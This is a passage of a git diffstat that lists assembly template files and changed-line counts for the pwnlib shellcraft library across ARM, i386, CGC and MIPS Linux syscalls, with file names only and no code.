+ .../templates/arm/linux/getppid.asm | 13 + .../templates/arm/linux/getpriority.asm | 14 + .../templates/arm/linux/getresgid.asm | 15 + .../templates/arm/linux/getresuid.asm | 15 + .../templates/arm/linux/getrlimit.asm | 14 + .../templates/arm/linux/getrusage.asm | 14 + .../shellcraft/templates/arm/linux/getsid.asm | 13 + .../templates/arm/linux/getsockname.asm | 15 + .../templates/arm/linux/getsockopt.asm | 17 + .../templates/arm/linux/gettimeofday.asm | 14 + .../shellcraft/templates/arm/linux/getuid.asm | 13 + .../shellcraft/templates/arm/linux/gtty.asm | 14 + .../shellcraft/templates/arm/linux/ioctl.asm | 15 + .../shellcraft/templates/arm/linux/ioperm.asm | 15 + .../shellcraft/templates/arm/linux/iopl.asm | 13 + .../shellcraft/templates/arm/linux/kill.asm | 14 + .../templates/arm/linux/killparent.asm | 17 + .../shellcraft/templates/arm/linux/lchown.asm | 15 + .../shellcraft/templates/arm/linux/link.asm | 14 + .../shellcraft/templates/arm/linux/linkat.asm | 17 + .../shellcraft/templates/arm/linux/listen.asm | 14 + .../shellcraft/templates/arm/linux/lseek.asm | 15 + .../shellcraft/templates/arm/linux/lstat.asm | 14 + .../templates/arm/linux/lstat64.asm | 14 + .../templates/arm/linux/madvise.asm | 15 + .../templates/arm/linux/mincore.asm | 15 + .../shellcraft/templates/arm/linux/mkdir.asm | 14 + .../templates/arm/linux/mkdirat.asm | 15 + .../shellcraft/templates/arm/linux/mknod.asm | 15 + .../templates/arm/linux/mknodat.asm | 16 + .../shellcraft/templates/arm/linux/mlock.asm | 14 + .../templates/arm/linux/mlockall.asm | 13 + .../shellcraft/templates/arm/linux/mmap.asm | 18 + .../templates/arm/linux/mprotect.asm | 15 + .../templates/arm/linux/mq_notify.asm | 14 + .../templates/arm/linux/mq_open.asm | 15 + .../templates/arm/linux/mq_timedreceive.asm | 17 + .../templates/arm/linux/mq_timedsend.asm | 17 + .../templates/arm/linux/mq_unlink.asm | 13 + .../shellcraft/templates/arm/linux/mremap.asm | 17 + .../shellcraft/templates/arm/linux/msync.asm | 15 + .../templates/arm/linux/munlock.asm | 14 + .../templates/arm/linux/munlockall.asm | 13 + .../shellcraft/templates/arm/linux/munmap.asm | 14 + .../templates/arm/linux/nanosleep.asm | 14 + .../shellcraft/templates/arm/linux/nice.asm | 13 + .../shellcraft/templates/arm/linux/open.asm | 15 + .../shellcraft/templates/arm/linux/openat.asm | 16 + .../shellcraft/templates/arm/linux/pause.asm | 13 + .../shellcraft/templates/arm/linux/pipe.asm | 13 + .../shellcraft/templates/arm/linux/pipe2.asm | 14 + .../shellcraft/templates/arm/linux/poll.asm | 15 + .../shellcraft/templates/arm/linux/ppoll.asm | 16 + .../shellcraft/templates/arm/linux/prctl.asm | 14 + .../shellcraft/templates/arm/linux/pread.asm | 16 + .../shellcraft/templates/arm/linux/preadv.asm | 16 + .../templates/arm/linux/prlimit64.asm | 16 + .../shellcraft/templates/arm/linux/profil.asm | 16 + .../shellcraft/templates/arm/linux/ptrace.asm | 14 + .../templates/arm/linux/putpmsg.asm | 17 + .../shellcraft/templates/arm/linux/pwrite.asm | 16 + .../templates/arm/linux/pwritev.asm | 16 + .../templates/arm/linux/readahead.asm | 15 + .../templates/arm/linux/readdir.asm | 13 + .../templates/arm/linux/readlink.asm | 15 + .../templates/arm/linux/readlinkat.asm | 16 + .../shellcraft/templates/arm/linux/readv.asm | 15 + .../shellcraft/templates/arm/linux/recv.asm | 16 + .../templates/arm/linux/recvfrom.asm | 18 + .../templates/arm/linux/recvmmsg.asm | 17 + .../templates/arm/linux/recvmsg.asm | 15 + .../templates/arm/linux/remap_file_pages.asm | 17 + .../shellcraft/templates/arm/linux/rename.asm | 14 + .../templates/arm/linux/renameat.asm | 16 + .../shellcraft/templates/arm/linux/rmdir.asm | 13 + .../arm/linux/sched_get_priority_max.asm | 13 + .../arm/linux/sched_get_priority_min.asm | 13 + .../templates/arm/linux/sched_getaffinity.asm | 15 + .../templates/arm/linux/sched_getparam.asm | 14 + .../arm/linux/sched_getscheduler.asm | 13 + .../arm/linux/sched_rr_get_interval.asm | 14 + .../templates/arm/linux/sched_setaffinity.asm | 15 + .../templates/arm/linux/sched_setparam.asm | 14 + .../arm/linux/sched_setscheduler.asm | 15 + .../templates/arm/linux/sched_yield.asm | 13 + .../shellcraft/templates/arm/linux/select.asm | 17 + .../templates/arm/linux/sendfile.asm | 16 + .../templates/arm/linux/sendfile64.asm | 16 + .../templates/arm/linux/setdomainname.asm | 14 + .../shellcraft/templates/arm/linux/setgid.asm | 13 + .../templates/arm/linux/setgroups.asm | 14 + .../templates/arm/linux/sethostname.asm | 14 + .../templates/arm/linux/setitimer.asm | 15 + .../templates/arm/linux/setpgid.asm | 14 + .../templates/arm/linux/setpriority.asm | 15 + .../templates/arm/linux/setregid.asm | 14 + .../templates/arm/linux/setresgid.asm | 15 + .../templates/arm/linux/setresuid.asm | 15 + .../templates/arm/linux/setreuid.asm | 14 + .../templates/arm/linux/setrlimit.asm | 14 + .../shellcraft/templates/arm/linux/setsid.asm | 13 + .../templates/arm/linux/setsockopt.asm | 18 + .../arm/linux/setsockopt_timeout.asm | 21 + .../templates/arm/linux/settimeofday.asm | 14 + .../shellcraft/templates/arm/linux/setuid.asm | 13 + pwnlib/shellcraft/templates/arm/linux/sh.asm | 16 +- .../templates/arm/linux/sigaction.asm | 15 + .../templates/arm/linux/sigaltstack.asm | 14 + .../shellcraft/templates/arm/linux/signal.asm | 14 + .../templates/arm/linux/sigpending.asm | 13 + .../templates/arm/linux/sigprocmask.asm | 15 + .../templates/arm/linux/sigreturn.asm | 11 +- .../templates/arm/linux/sigsuspend.asm | 13 + .../shellcraft/templates/arm/linux/splice.asm | 18 + .../shellcraft/templates/arm/linux/stat.asm | 14 + .../shellcraft/templates/arm/linux/stat64.asm | 14 + .../shellcraft/templates/arm/linux/stime.asm | 13 + .../shellcraft/templates/arm/linux/stty.asm | 14 + .../templates/arm/linux/symlink.asm | 14 + .../templates/arm/linux/symlinkat.asm | 15 + .../shellcraft/templates/arm/linux/sync.asm | 13 + .../templates/arm/linux/sync_file_range.asm | 16 + .../templates/arm/linux/syscall.asm | 43 +- .../shellcraft/templates/arm/linux/syslog.asm | 15 + pwnlib/shellcraft/templates/arm/linux/tee.asm | 16 + .../shellcraft/templates/arm/linux/time.asm | 13 + .../templates/arm/linux/timer_create.asm | 15 + .../templates/arm/linux/timer_delete.asm | 13 + .../templates/arm/linux/timer_getoverrun.asm | 13 + .../templates/arm/linux/timer_gettime.asm | 14 + .../templates/arm/linux/timer_settime.asm | 16 + .../templates/arm/linux/truncate.asm | 14 + .../templates/arm/linux/truncate64.asm | 14 + .../shellcraft/templates/arm/linux/ulimit.asm | 14 + .../shellcraft/templates/arm/linux/umask.asm | 13 + .../shellcraft/templates/arm/linux/uname.asm | 13 + .../shellcraft/templates/arm/linux/unlink.asm | 13 + .../templates/arm/linux/unlinkat.asm | 15 + .../templates/arm/linux/unshare.asm | 13 + .../shellcraft/templates/arm/linux/ustat.asm | 14 + .../shellcraft/templates/arm/linux/utime.asm | 14 + .../templates/arm/linux/utimensat.asm | 16 + .../shellcraft/templates/arm/linux/utimes.asm | 14 + .../shellcraft/templates/arm/linux/vfork.asm | 13 + .../templates/arm/linux/vhangup.asm | 13 + .../templates/arm/linux/vmsplice.asm | 16 + .../shellcraft/templates/arm/linux/wait4.asm | 16 + .../shellcraft/templates/arm/linux/waitid.asm | 16 + .../templates/arm/linux/waitpid.asm | 15 + .../shellcraft/templates/arm/linux/write.asm | 15 + .../shellcraft/templates/arm/linux/writev.asm | 15 + pwnlib/shellcraft/templates/arm/memcpy.asm | 19 + pwnlib/shellcraft/templates/arm/mov.asm | 101 +++- pwnlib/shellcraft/templates/arm/push.asm | 19 +- pwnlib/shellcraft/templates/arm/pushstr.asm | 21 +- pwnlib/shellcraft/templates/arm/setregs.asm | 43 ++ pwnlib/shellcraft/templates/arm/to_thumb.asm | 20 +- pwnlib/shellcraft/templates/arm/trap.asm | 8 +- pwnlib/shellcraft/templates/arm/udiv_10.asm | 18 + pwnlib/shellcraft/templates/arm/xor.asm | 67 +++ pwnlib/shellcraft/templates/i386/cgc/__doc__ | 0 .../templates/i386/cgc/allocate.asm | 17 + pwnlib/shellcraft/templates/i386/cgc/cat.asm | 17 + .../templates/i386/cgc/deallocate.asm | 16 + .../shellcraft/templates/i386/cgc/fdwait.asm | 19 + .../shellcraft/templates/i386/cgc/random.asm | 17 + .../shellcraft/templates/i386/cgc/receive.asm | 18 + .../templates/i386/cgc/sendfile.asm | 29 ++ .../shellcraft/templates/i386/cgc/syscall.asm | 42 ++ .../templates/i386/cgc/terminate.asm | 15 + .../templates/i386/cgc/transmit.asm | 18 + pwnlib/shellcraft/templates/i386/crash.asm | 11 + pwnlib/shellcraft/templates/i386/epilog.asm | 14 + .../templates/i386/freebsd/push.asm | 2 +- .../shellcraft/templates/i386/freebsd/sh.asm | 4 +- pwnlib/shellcraft/templates/i386/function.asm | 65 +++ pwnlib/shellcraft/templates/i386/getpc.asm | 12 + pwnlib/shellcraft/templates/i386/itoa.asm | 61 +++ .../templates/i386/linux/accept.asm | 15 + .../templates/i386/linux/access.asm | 14 + .../shellcraft/templates/i386/linux/acct.asm | 13 + .../shellcraft/templates/i386/linux/alarm.asm | 13 + .../shellcraft/templates/i386/linux/bind.asm | 15 + .../shellcraft/templates/i386/linux/brk.asm | 13 + .../shellcraft/templates/i386/linux/chdir.asm | 13 + .../shellcraft/templates/i386/linux/chmod.asm | 14 + .../shellcraft/templates/i386/linux/chown.asm | 15 + .../templates/i386/linux/chroot.asm | 13 + .../templates/i386/linux/clock_getres.asm | 14 + .../templates/i386/linux/clock_gettime.asm | 14 + .../templates/i386/linux/clock_nanosleep.asm | 16 + .../templates/i386/linux/clock_settime.asm | 14 + .../shellcraft/templates/i386/linux/clone.asm | 17 + .../shellcraft/templates/i386/linux/close.asm | 13 + .../templates/i386/linux/connect.asm | 30 +- .../shellcraft/templates/i386/linux/creat.asm | 14 + .../shellcraft/templates/i386/linux/dir.asm | 17 + .../shellcraft/templates/i386/linux/dup.asm | 25 +- .../shellcraft/templates/i386/linux/dup2.asm | 14 + .../shellcraft/templates/i386/linux/dup3.asm | 15 + .../shellcraft/templates/i386/linux/dupio.asm | 21 + .../shellcraft/templates/i386/linux/dupsh.asm | 2 +- .../shellcraft/templates/i386/linux/echo.asm | 2 +- .../templates/i386/linux/egghunter.asm | 73 +++ .../templates/i386/linux/epoll_create.asm | 13 + .../templates/i386/linux/epoll_create1.asm | 13 + .../templates/i386/linux/epoll_ctl.asm | 16 + .../templates/i386/linux/epoll_pwait.asm | 17 + .../templates/i386/linux/epoll_wait.asm | 16 + .../templates/i386/linux/execve.asm | 47 ++ .../templates/i386/linux/faccessat.asm | 16 + .../templates/i386/linux/fallocate.asm | 16 + .../templates/i386/linux/fchdir.asm | 13 + .../templates/i386/linux/fchmod.asm | 14 + .../templates/i386/linux/fchmodat.asm | 16 + .../templates/i386/linux/fchown.asm | 15 + .../templates/i386/linux/fchownat.asm | 17 + .../shellcraft/templates/i386/linux/fcntl.asm | 15 + .../templates/i386/linux/fdatasync.asm | 13 + .../shellcraft/templates/i386/linux/flock.asm | 14 + .../shellcraft/templates/i386/linux/fork.asm | 13 + .../templates/i386/linux/forkbomb.asm | 13 + .../templates/i386/linux/forkexit.asm | 16 + .../shellcraft/templates/i386/linux/fstat.asm | 14 + .../templates/i386/linux/fstat64.asm | 14 + .../templates/i386/linux/fstatat64.asm | 16 + .../shellcraft/templates/i386/linux/fsync.asm | 13 + .../templates/i386/linux/ftruncate.asm | 14 + .../templates/i386/linux/ftruncate64.asm | 14 + .../templates/i386/linux/futimesat.asm | 15 + .../templates/i386/linux/getcwd.asm | 14 + .../templates/i386/linux/getdents.asm | 33 +- .../templates/i386/linux/getegid.asm | 13 + .../templates/i386/linux/geteuid.asm | 13 + .../templates/i386/linux/getgid.asm | 13 + .../templates/i386/linux/getgroups.asm | 14 + .../templates/i386/linux/getitimer.asm | 14 + .../templates/i386/linux/getpeername.asm | 15 + .../templates/i386/linux/getpgid.asm | 13 + .../templates/i386/linux/getpgrp.asm | 13 + .../templates/i386/linux/getpid.asm | 13 + .../templates/i386/linux/getpmsg.asm | 17 + .../templates/i386/linux/getppid.asm | 13 + .../templates/i386/linux/getpriority.asm | 14 + .../templates/i386/linux/getresgid.asm | 15 + .../templates/i386/linux/getresuid.asm | 15 + .../templates/i386/linux/getrlimit.asm | 14 + .../templates/i386/linux/getrusage.asm | 14 + .../templates/i386/linux/getsid.asm | 13 + .../templates/i386/linux/getsockname.asm | 15 + .../templates/i386/linux/getsockopt.asm | 17 + .../templates/i386/linux/gettimeofday.asm | 14 + .../templates/i386/linux/getuid.asm | 13 + .../shellcraft/templates/i386/linux/gtty.asm | 14 + .../shellcraft/templates/i386/linux/ioctl.asm | 15 + .../templates/i386/linux/ioperm.asm | 15 + .../shellcraft/templates/i386/linux/iopl.asm | 13 + .../shellcraft/templates/i386/linux/kill.asm | 14 + .../templates/i386/linux/killparent.asm | 17 + .../templates/i386/linux/lchown.asm | 15 + .../shellcraft/templates/i386/linux/link.asm | 14 + .../templates/i386/linux/linkat.asm | 17 + .../templates/i386/linux/listen.asm | 14 + .../templates/i386/linux/loader.asm | 173 +++++++ .../templates/i386/linux/loader_append.asm | 55 +++ .../shellcraft/templates/i386/linux/lseek.asm | 15 + .../shellcraft/templates/i386/linux/lstat.asm | 14 + .../templates/i386/linux/lstat64.asm | 14 + .../templates/i386/linux/madvise.asm | 15 + .../templates/i386/linux/mincore.asm | 15 + .../shellcraft/templates/i386/linux/mkdir.asm | 14 + .../templates/i386/linux/mkdirat.asm | 15 + .../shellcraft/templates/i386/linux/mknod.asm | 15 + .../templates/i386/linux/mknodat.asm | 16 + .../shellcraft/templates/i386/linux/mlock.asm | 14 + .../templates/i386/linux/mlockall.asm | 13 + .../shellcraft/templates/i386/linux/mmap.asm | 17 + .../templates/i386/linux/mprotect.asm | 15 + .../templates/i386/linux/mq_notify.asm | 14 + .../templates/i386/linux/mq_open.asm | 15 + .../templates/i386/linux/mq_timedreceive.asm | 17 + .../templates/i386/linux/mq_timedsend.asm | 17 + .../templates/i386/linux/mq_unlink.asm | 13 + .../templates/i386/linux/mremap.asm | 17 + .../shellcraft/templates/i386/linux/msync.asm | 15 + .../templates/i386/linux/munlock.asm | 14 + .../templates/i386/linux/munlockall.asm | 13 + .../templates/i386/linux/munmap.asm | 14 + .../templates/i386/linux/nanosleep.asm | 14 + .../shellcraft/templates/i386/linux/nice.asm | 13 + .../shellcraft/templates/i386/linux/open.asm | 15 + .../templates/i386/linux/openat.asm | 16 + .../shellcraft/templates/i386/linux/pause.asm | 13 + .../templates/i386/linux/pidmax.asm | 41 ++ .../shellcraft/templates/i386/linux/pipe.asm | 13 + .../shellcraft/templates/i386/linux/pipe2.asm | 14 + .../shellcraft/templates/i386/linux/poll.asm | 15 + .../shellcraft/templates/i386/linux/ppoll.asm | 16 + .../shellcraft/templates/i386/linux/prctl.asm | 14 + .../shellcraft/templates/i386/linux/pread.asm | 16 + .../templates/i386/linux/preadv.asm | 16 + .../templates/i386/linux/prlimit64.asm | 16 + .../templates/i386/linux/profil.asm | 16 + .../templates/i386/linux/ptrace.asm | 14 + .../shellcraft/templates/i386/linux/push.asm | 2 +- .../templates/i386/linux/putpmsg.asm | 17 + .../templates/i386/linux/pwrite.asm | 16 + .../templates/i386/linux/pwritev.asm | 16 + .../templates/i386/linux/readahead.asm | 15 + .../templates/i386/linux/readdir.asm | 13 + .../templates/i386/linux/readlink.asm | 15 + .../templates/i386/linux/readlinkat.asm | 16 + .../shellcraft/templates/i386/linux/readn.asm | 23 + .../shellcraft/templates/i386/linux/readv.asm | 15 + .../shellcraft/templates/i386/linux/recv.asm | 16 + .../templates/i386/linux/recvfrom.asm | 18 + .../templates/i386/linux/recvmmsg.asm | 17 + .../templates/i386/linux/recvmsg.asm | 15 + .../templates/i386/linux/remap_file_pages.asm | 17 + .../templates/i386/linux/rename.asm | 14 + .../templates/i386/linux/renameat.asm | 16 + .../shellcraft/templates/i386/linux/rmdir.asm | 13 + .../i386/linux/sched_get_priority_max.asm | 13 + .../i386/linux/sched_get_priority_min.asm | 13 + .../i386/linux/sched_getaffinity.asm | 15 + .../templates/i386/linux/sched_getparam.asm | 14 + .../i386/linux/sched_getscheduler.asm | 13 + .../i386/linux/sched_rr_get_interval.asm | 14 + .../i386/linux/sched_setaffinity.asm | 15 + .../templates/i386/linux/sched_setparam.asm | 14 + .../i386/linux/sched_setscheduler.asm | 15 + .../templates/i386/linux/sched_yield.asm | 13 + .../templates/i386/linux/select.asm | 17 + .../templates/i386/linux/sendfile.asm | 16 + .../templates/i386/linux/sendfile64.asm | 16 + .../templates/i386/linux/setdomainname.asm | 14 + .../templates/i386/linux/setgid.asm | 13 + .../templates/i386/linux/setgroups.asm | 14 + .../templates/i386/linux/sethostname.asm | 14 + .../templates/i386/linux/setitimer.asm | 15 + .../templates/i386/linux/setpgid.asm | 14 + .../templates/i386/linux/setpriority.asm | 15 + .../templates/i386/linux/setresgid.asm | 15 + .../templates/i386/linux/setresuid.asm | 15 + .../templates/i386/linux/setrlimit.asm | 14 + .../templates/i386/linux/setsid.asm | 13 + .../templates/i386/linux/setsockopt.asm | 24 + .../i386/linux/setsockopt_timeout.asm | 19 + .../templates/i386/linux/settimeofday.asm | 14 + .../templates/i386/linux/setuid.asm | 13 + pwnlib/shellcraft/templates/i386/linux/sh.asm | 11 +- .../templates/i386/linux/sigaction.asm | 15 + .../templates/i386/linux/sigaltstack.asm | 14 + .../templates/i386/linux/signal.asm | 14 + .../templates/i386/linux/sigpending.asm | 13 + .../templates/i386/linux/sigprocmask.asm | 15 + .../templates/i386/linux/sigsuspend.asm | 13 + .../templates/i386/linux/socket.asm | 12 + .../templates/i386/linux/socketcall.asm | 15 + .../templates/i386/linux/splice.asm | 18 + .../shellcraft/templates/i386/linux/stage.asm | 59 +++ .../shellcraft/templates/i386/linux/stat.asm | 14 + .../templates/i386/linux/stat64.asm | 14 + .../shellcraft/templates/i386/linux/stime.asm | 13 + .../shellcraft/templates/i386/linux/stty.asm | 14 + .../templates/i386/linux/symlink.asm | 14 + .../templates/i386/linux/symlinkat.asm | 15 + .../shellcraft/templates/i386/linux/sync.asm | 13 + .../templates/i386/linux/sync_file_range.asm | 16 + .../templates/i386/linux/syscall.asm | 20 +- .../templates/i386/linux/syslog.asm | 15 + .../shellcraft/templates/i386/linux/tee.asm | 16 + .../shellcraft/templates/i386/linux/time.asm | 13 + .../templates/i386/linux/timer_create.asm | 15 + .../templates/i386/linux/timer_delete.asm | 13 + .../templates/i386/linux/timer_getoverrun.asm | 13 + .../templates/i386/linux/timer_gettime.asm | 14 + .../templates/i386/linux/timer_settime.asm | 16 + .../templates/i386/linux/truncate.asm | 14 + .../templates/i386/linux/truncate64.asm | 14 + .../templates/i386/linux/ulimit.asm | 14 + .../shellcraft/templates/i386/linux/umask.asm | 13 + .../shellcraft/templates/i386/linux/uname.asm | 13 + .../templates/i386/linux/unlink.asm | 13 + .../templates/i386/linux/unlinkat.asm | 15 + .../templates/i386/linux/unshare.asm | 13 + .../shellcraft/templates/i386/linux/ustat.asm | 14 + .../shellcraft/templates/i386/linux/utime.asm | 14 + .../templates/i386/linux/utimensat.asm | 16 + .../templates/i386/linux/utimes.asm | 14 + .../shellcraft/templates/i386/linux/vfork.asm | 13 + .../templates/i386/linux/vhangup.asm | 13 + .../templates/i386/linux/vmsplice.asm | 16 + .../shellcraft/templates/i386/linux/wait4.asm | 16 + .../templates/i386/linux/waitid.asm | 16 + .../templates/i386/linux/waitpid.asm | 15 + .../templates/i386/linux/writev.asm | 15 + pwnlib/shellcraft/templates/i386/memcpy.asm | 15 + pwnlib/shellcraft/templates/i386/mov.asm | 29 +- pwnlib/shellcraft/templates/i386/prolog.asm | 6 + pwnlib/shellcraft/templates/i386/push.asm | 21 +- pwnlib/shellcraft/templates/i386/pushstr.asm | 21 +- .../templates/i386/pushstr_array.asm | 38 ++ pwnlib/shellcraft/templates/i386/setregs.asm | 7 +- pwnlib/shellcraft/templates/i386/stackarg.asm | 13 + pwnlib/shellcraft/templates/i386/strcpy.asm | 28 ++ pwnlib/shellcraft/templates/i386/strlen.asm | 35 ++ pwnlib/shellcraft/templates/i386/xor.asm | 82 ++++ .../templates/mips/linux/accept.asm | 15 + .../templates/mips/linux/access.asm | 14 + .../shellcraft/templates/mips/linux/acct.asm | 13 + .../shellcraft/templates/mips/linux/alarm.asm | 13 + .../shellcraft/templates/mips/linux/bind.asm | 15 + .../shellcraft/templates/mips/linux/brk.asm | 13 + .../shellcraft/templates/mips/linux/cat.asm | 24 + .../shellcraft/templates/mips/linux/chdir.asm | 13 + .../shellcraft/templates/mips/linux/chmod.asm | 14 + .../shellcraft/templates/mips/linux/chown.asm | 15 + .../templates/mips/linux/chroot.asm | 13 + .../templates/mips/linux/clock_getres.asm | 14 + .../templates/mips/linux/clock_gettime.asm | 14 + .../templates/mips/linux/clock_nanosleep.asm | 16 + .../templates/mips/linux/clock_settime.asm | 14 + .../shellcraft/templates/mips/linux/clone.asm | 17 + .../shellcraft/templates/mips/linux/close.asm | 13 + .../templates/mips/linux/connect.asm | 26 + .../shellcraft/templates/mips/linux/creat.asm | 14 + .../shellcraft/templates/mips/linux/dup.asm | 13 + .../shellcraft/templates/mips/linux/dup2.asm | 14 + .../shellcraft/templates/mips/linux/dup3.asm | 15 + .../shellcraft/templates/mips/linux/echo.asm | 6 + .../templates/mips/linux/epoll_create.asm | 13 + .../templates/mips/linux/epoll_create1.asm | 13 + .../templates/mips/linux/epoll_ctl.asm | 16 + .../templates/mips/linux/epoll_pwait.asm | 17 + .../templates/mips/linux/epoll_wait.asm | 16 + .../templates/mips/linux/execve.asm | 15 + .../shellcraft/templates/mips/linux/exit.asm | 13 + .../templates/mips/linux/faccessat.asm | 16 + .../templates/mips/linux/fallocate.asm | 16 + .../templates/mips/linux/fchdir.asm | 13 + .../templates/mips/linux/fchmod.asm | 14 + .../templates/mips/linux/fchmodat.asm | 16 + .../templates/mips/linux/fchown.asm | 15 + .../templates/mips/linux/fchownat.asm | 17 + .../shellcraft/templates/mips/linux/fcntl.asm | 15 + .../templates/mips/linux/fdatasync.asm | 13 + .../shellcraft/templates/mips/linux/flock.asm | 14 + .../shellcraft/templates/mips/linux/fork.asm | 13 + .../templates/mips/linux/forkbomb.asm | 15 + .../templates/mips/linux/forkexit.asm | 15 + .../shellcraft/templates/mips/linux/fstat.asm | 14 + .../templates/mips/linux/fstat64.asm | 14 + .../templates/mips/linux/fstatat64.asm | 16 + .../shellcraft/templates/mips/linux/fsync.asm | 13 + .../templates/mips/linux/ftruncate.asm | 14 + .../templates/mips/linux/ftruncate64.asm | 14 + .../templates/mips/linux/futimesat.asm | 15 + .../templates/mips/linux/getcwd.asm | 14 + .../templates/mips/linux/getegid.asm | 13 + .../templates/mips/linux/geteuid.asm | 13 + .../templates/mips/linux/getgid.asm | 13 + .../templates/mips/linux/getgroups.asm | 14 + .../templates/mips/linux/getitimer.asm | 14 + .../templates/mips/linux/getpeername.asm | 15 + .../templates/mips/linux/getpgid.asm | 13 + .../templates/mips/linux/getpgrp.asm | 13 + .../templates/mips/linux/getpid.asm | 13 + .../templates/mips/linux/getpmsg.asm | 17 + .../templates/mips/linux/getppid.asm | 13 + .../templates/mips/linux/getpriority.asm | 14 + .../templates/mips/linux/getresgid.asm | 15 + .../templates/mips/linux/getresuid.asm | 15 + .../templates/mips/linux/getrlimit.asm | 14 + .../templates/mips/linux/getrusage.asm | 14 + .../templates/mips/linux/getsid.asm | 13 + .../templates/mips/linux/getsockname.asm | 15 + .../templates/mips/linux/getsockopt.asm | 17 + .../templates/mips/linux/gettimeofday.asm | 14 + .../templates/mips/linux/getuid.asm | 13 + .../shellcraft/templates/mips/linux/gtty.asm | 14 + .../shellcraft/templates/mips/linux/ioctl.asm | 15 + .../templates/mips/linux/ioperm.asm | 15 + .../shellcraft/templates/mips/linux/iopl.asm | 13 + .../shellcraft/templates/mips/linux/kill.asm | 14 + .../templates/mips/linux/killparent.asm | 16 + .../templates/mips/linux/lchown.asm | 15 + .../shellcraft/templates/mips/linux/link.asm | 14 + .../templates/mips/linux/linkat.asm | 17 + .../templates/mips/linux/listen.asm | 14 + .../shellcraft/templates/mips/linux/lseek.asm | 15 + .../shellcraft/templates/mips/linux/lstat.asm | 14 + .../templates/mips/linux/lstat64.asm | 14 + .../templates/mips/linux/madvise.asm | 15 + .../templates/mips/linux/mincore.asm | 15 + .../shellcraft/templates/mips/linux/mkdir.asm | 14 + .../templates/mips/linux/mkdirat.asm | 15 + .../shellcraft/templates/mips/linux/mknod.asm | 15 + .../templates/mips/linux/mknodat.asm | 16 + .../shellcraft/templates/mips/linux/mlock.asm | 14 + .../templates/mips/linux/mlockall.asm | 13 + .../shellcraft/templates/mips/linux/mmap.asm | 18 + .../templates/mips/linux/mprotect.asm | 15 + .../templates/mips/linux/mq_notify.asm | 14 + .../templates/mips/linux/mq_open.asm | 15 + .../templates/mips/linux/mq_timedreceive.asm | 17 + .../templates/mips/linux/mq_timedsend.asm | 17 + .../templates/mips/linux/mq_unlink.asm | 13 + .../templates/mips/linux/mremap.asm | 17 + .../shellcraft/templates/mips/linux/msync.asm | 15 + .../templates/mips/linux/munlock.asm | 14 + .../templates/mips/linux/munlockall.asm | 13 + .../templates/mips/linux/munmap.asm | 14 + .../templates/mips/linux/nanosleep.asm | 14 + .../shellcraft/templates/mips/linux/nice.asm | 13 + .../shellcraft/templates/mips/linux/open.asm | 15 + .../templates/mips/linux/openat.asm | 16 + .../shellcraft/templates/mips/linux/pause.asm | 13 + .../shellcraft/templates/mips/linux/pipe.asm | 13 + .../shellcraft/templates/mips/linux/pipe2.asm | 14 + .../shellcraft/templates/mips/linux/poll.asm | 15 + .../shellcraft/templates/mips/linux/ppoll.asm | 16 + .../shellcraft/templates/mips/linux/prctl.asm | 14 + .../shellcraft/templates/mips/linux/pread.asm | 16 + .../templates/mips/linux/preadv.asm | 16 + .../templates/mips/linux/prlimit64.asm | 16 + .../templates/mips/linux/profil.asm | 16 + .../templates/mips/linux/ptrace.asm | 14 + .../templates/mips/linux/putpmsg.asm | 17 + .../templates/mips/linux/pwrite.asm | 16 + .../templates/mips/linux/pwritev.asm | 16 + .../shellcraft/templates/mips/linux/read.asm | 2 +- .../templates/mips/linux/readahead.asm | 15 + .../templates/mips/linux/readdir.asm | 13 + .../templates/mips/linux/readlink.asm | 15 + .../templates/mips/linux/readlinkat.asm | 16 + .../shellcraft/templates/mips/linux/readv.asm | 15 + .../shellcraft/templates/mips/linux/recv.asm | 16 + .../templates/mips/linux/recvfrom.asm | 18 + .../templates/mips/linux/recvmmsg.asm | 17 + .../templates/mips/linux/recvmsg.asm | 15 + .../templates/mips/linux/remap_file_pages.asm | 17 + .../templates/mips/linux/rename.asm | 14 + .../templates/mips/linux/renameat.asm | 16 + .../shellcraft/templates/mips/linux/rmdir.asm | 13 + .../mips/linux/sched_get_priority_max.asm | 13 + .../mips/linux/sched_get_priority_min.asm | 13 + .../mips/linux/sched_getaffinity.asm | 15 + .../templates/mips/linux/sched_getparam.asm | 14 + .../mips/linux/sched_getscheduler.asm | 13 + .../mips/linux/sched_rr_get_interval.asm | 14 + .../mips/linux/sched_setaffinity.asm | 15 + .../templates/mips/linux/sched_setparam.asm | 14 + .../mips/linux/sched_setscheduler.asm | 15 + .../templates/mips/linux/sched_yield.asm | 13 + .../templates/mips/linux/select.asm | 17 + .../templates/mips/linux/sendfile.asm | 16 + .../templates/mips/linux/sendfile64.asm | 16 + .../templates/mips/linux/setdomainname.asm | 14 + .../templates/mips/linux/setgid.asm | 13 + .../templates/mips/linux/setgroups.asm | 14 + .../templates/mips/linux/sethostname.asm | 14 + .../templates/mips/linux/setitimer.asm | 15 + .../templates/mips/linux/setpgid.asm | 14 + .../templates/mips/linux/setpriority.asm | 15 + .../templates/mips/linux/setregid.asm | 14 + .../templates/mips/linux/setresgid.asm | 15 + .../templates/mips/linux/setresuid.asm | 15 + .../templates/mips/linux/setreuid.asm | 14 + .../templates/mips/linux/setrlimit.asm | 14 + .../templates/mips/linux/setsid.asm | 13 + .../templates/mips/linux/settimeofday.asm | 14 + .../templates/mips/linux/setuid.asm | 13 + pwnlib/shellcraft/templates/mips/linux/sh.asm | 7 + .../templates/mips/linux/sigaction.asm | 15 + .../templates/mips/linux/sigaltstack.asm | 14 + .../templates/mips/linux/signal.asm | 14 + .../templates/mips/linux/sigpending.asm | 13 + .../templates/mips/linux/sigprocmask.asm | 15 + .../templates/mips/linux/sigreturn.asm | 10 +- .../templates/mips/linux/sigsuspend.asm | 13 + .../templates/mips/linux/splice.asm | 18 + .../shellcraft/templates/mips/linux/stat.asm | 14 + .../templates/mips/linux/stat64.asm | 14 + .../shellcraft/templates/mips/linux/stime.asm | 13 + .../shellcraft/templates/mips/linux/stty.asm | 14 + .../templates/mips/linux/symlink.asm | 14 + .../templates/mips/linux/symlinkat.asm | 15 + .../shellcraft/templates/mips/linux/sync.asm | 13 + .../templates/mips/linux/sync_file_range.asm | 16 + .../templates/mips/linux/syscall.asm | 106 ++-- .../templates/mips/linux/syslog.asm | 15 + .../shellcraft/templates/mips/linux/tee.asm | 16 + .../shellcraft/templates/mips/linux/time.asm | 13 + .../templates/mips/linux/timer_create.asm | 15 + .../templates/mips/linux/timer_delete.asm | 13 + .../templates/mips/linux/timer_getoverrun.asm | 13 + .../templates/mips/linux/timer_gettime.asm | 14 + .../templates/mips/linux/timer_settime.asm | 16 + 